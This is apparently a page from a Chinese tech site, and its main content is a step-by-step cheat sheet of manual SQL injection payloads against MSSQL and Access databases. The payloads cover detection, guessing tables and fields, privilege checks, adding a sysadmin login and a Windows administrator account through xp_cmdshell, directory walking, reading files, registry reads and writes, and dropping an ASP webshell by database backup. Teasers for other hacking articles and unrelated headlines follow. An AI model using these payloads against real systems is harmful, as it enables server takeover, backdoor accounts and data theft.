手工注入的步骤 手工注入有哪些命令?
判断是否有注入;and 1=1 ;and 1=2
2.初步判断是否是mssql ;and user>0
3.注入参数是字符'and [查询条件] and ''='
4.搜索时没过滤参数的'and [查询条件] and '%25'='
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>08.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;exec master.dbo.sp_addsrvrolemember sysadmin username;--;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--;exec master.dbo.xp_cmdshell 'net user username password /add';--;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)遍历目录;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
13.mssql中的存储过程xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值xp_regread 根键,子键,键值名
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表xp_regdeletevalue 根键,子键,值名exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('');backup database model to disk='g:\wwwtest\l.asp';
shell脚本怎么监控mysol服务器?shell脚本监控mysol服务器的步骤
监控MySQL服务是否正常,通常的思路为:检查3306端口是否启动,ps查看mysqld进程是否启动,命令行登录mysql执行语句返回结果,php或jsp程序检测(需要开发人员开发程序)等等;方法1:监听3306端口方法2:查看mys
详情2018-01-05 11:04:57责编:llp 来源:驱动管家安装vista系统的电脑怎么查看无线网络?查看无线网络的步骤是什么?
在Vista系统中只有先启动内置无线服务功能,才可以用系统自带的管理软件对无线网卡进行配置和管理。一、 启动系统内置无线网络服务功能1 右键点击“计算机”,选择“管理 ”。2 选择“服务和应用程序”---
详情2018-01-14 11:53:56责编:llp 来源:驱动管家u盘文件加密怎么做?U盘文件加密需要注意什么?
现在U盘的存储空间越来越大,读写速度越来越快,可以轻松存储大量的文件到U盘里面;同时,优盘具有便携性等特点,使得U盘的使用极为普遍。但是,优盘在方便了工作生活的同时,也面临着一些风险。尤其是当U盘文件
详情2018-01-10 08:43:37责编:llp 来源:驱动管家虚拟主机的危机 hzhost虚拟主机有什么致命漏洞?
编者注:HZHOST虚拟主机管理系统,在国内的虚拟主机应用比较广泛,但是存了这样的一个漏洞让人觉得心惊,也让整个虚拟主机系统沦陷。千里之堤,毁于蚁穴!在此提醒各位网络管理员(站长),在做好系统的维护的同
详情2018-01-13 08:49:38责编:llp 来源:驱动管家PaaS安全问题 同PaaS提供商签订合同应该考虑哪些问题?
为了避免基础架构即服务(IaaS)的安全问题,很多担心安全的企业使用一个简单的解决方案:在它们进入云端之前加密对象。不幸的是,这种方法对于减缓平台即服务(PaaS)的安全问题并不是最优的方案。PaaS创造了数
详情2018-02-24 18:18:40责编:llp 来源:驱动管家缓冲区溢出教程 解密缓冲区溢出
如何执行 bin sh?在C中,spawn出一个shell的代码可能象这样:shell c : includevoid main(){char *shell[2];shell[0] = " bin sh ";shell[1] = NULL;execve(shell[0], shell, NULL);}[murat@victim mu
详情2018-01-26 14:10:28责编:llp 来源:驱动管家渗透黑客培训机构网站 入侵学黑客培训基地的步骤
最近在网上老是看到有人说被一个网址为“http: www xuehk com”的黑客培训机构骗了钱,而且骗取的金额数目可不少。于是,抱着为民除 害的心态,准备对这个所谓的黑客培训机构进行一次渗透。在网上搜索了一些关
详情2018-02-23 20:21:15责编:llp 来源:驱动管家备份共享文件,大势至软件只需一步就可以完成
日常工作中,我们经常会遇到这样的情况:有人误删服务器中的共享文件,导致无法恢复,如果其中涉及企业重要商业机密,则有可能给企业带来不可估量的损失。操作系统本身对于共享文件的管理只能做到只读、禁止删除
详情2018-02-04 20:13:36责编:llp 来源:驱动管家建站之星教程 怎么获取建站之星后台的权限?
建站之星全版本后台通杀getshell的解析:找到一个fck改的编辑器,准备用解析洞日之。然后发现无法这玩意直接过滤了“ ”创建不了解析文件夹,反复试了几次之后发现这个过滤是有延迟的。大概在0 1秒后 才会去掉。
详情2018-01-29 20:50:47责编:llp 来源:驱动管家勒索软件补丁:安装android7.0 nougat
有一天打开电脑,发现电脑已经被锁住,窗口弹出说明:如果你不给钱,就把你的电脑清空,这就是遇到了勒索软件。近年来,这种勒索已经频频出现在安卓手机上,手机里的重要资料可能比电脑里还多,这时候怎么办,真
详情2018-01-04 09:11:33责编:llp 来源:驱动管家
- 【游戏攻略】绝地求生全军出击4倍镜怎么用 四倍镜瞄准技巧详解
- 只需799元,就能买到酷派大神f1 plus
- 苹果电脑上切换桌面的快捷键是什么?切换桌面快捷键操作
- csrf worm技术分析 百度有哪些漏洞会导致web蠕虫出现?
- 360杀毒软件怎么升级?360杀毒病毒库升级办法
- 微鲸投影仪能不能升级无线投屏?怎么升级
- 搜狐20年 张朝阳:互联网的机会还在涌现
- 【游戏攻略】不想去机场刚枪?六大野点选择推荐
- 手机在哪些方面耗电?这些方法可以帮助你手机省电
- 小米怎么预约?小米note预约的步骤
- 百度云群组怎么退出?加入百度云群组后想退出怎么办?
- 安卓手机模拟器怎样创建?安卓手机模拟器有什么用?
- 正向木马能连接内网机器吗?什么是反弹连接木马?
- 360新闻弹窗怎么打开?360新闻弹窗在哪儿设置?
- 【游戏攻略】绝地求生女玩家最喜欢的三套时装 学好搭配撩妹不要太简单
- 【游戏攻略】《绝地求生》SKS现实原型介绍 SKS原型是什么
- 比特精灵是什么软件?比特精灵怎么使用
- 如何解决ios10耗电快的问题?有哪些方法可以帮ios10省电?
- 酷派大神note怎么样?酷派大神note跑分是多少?
- 查ip地址的方法有哪些?怎样查ip地址?